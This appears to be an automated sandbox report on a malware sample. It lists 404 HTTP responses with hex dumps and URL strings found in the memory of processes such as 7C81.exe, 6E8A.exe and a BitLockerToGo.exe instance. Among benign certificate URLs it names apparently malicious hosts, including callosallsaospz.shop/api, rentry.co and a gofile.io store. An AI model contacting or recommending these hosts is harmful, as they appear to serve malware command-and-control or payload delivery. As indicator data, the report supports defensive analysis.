Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:33:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	String found in binary or memory: http://.css
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: 6E8A.exe.2.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6E8A.exe.2.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://ocsps.ssl.com0?
Source: 6E8A.exe.2.dr	String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000002.00000000.2080799819.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081253102.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081273713.0000000008890000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A36808000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A3693F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store4.gofile.io
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000002.00000000.2085955197.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 3530.exe, 3530.exe.2.dr	String found in binary or memory: http://www.oberhumer.com
Source: 6E8A.exe.2.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: 6E8A.exe.2.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000002.00000000.2083945040.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2081714361.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2080080282.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2079158771.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 0000000E.00000003.3018136549.000000000084D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3000915062.000000000084C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044151506.000000000084F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055424185.000000000084E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035776586.000000000084D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop///
Source: BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/0
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/D
Source: BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 0000000E.00000003.3055164389.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apiQbd
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apicnmamaa
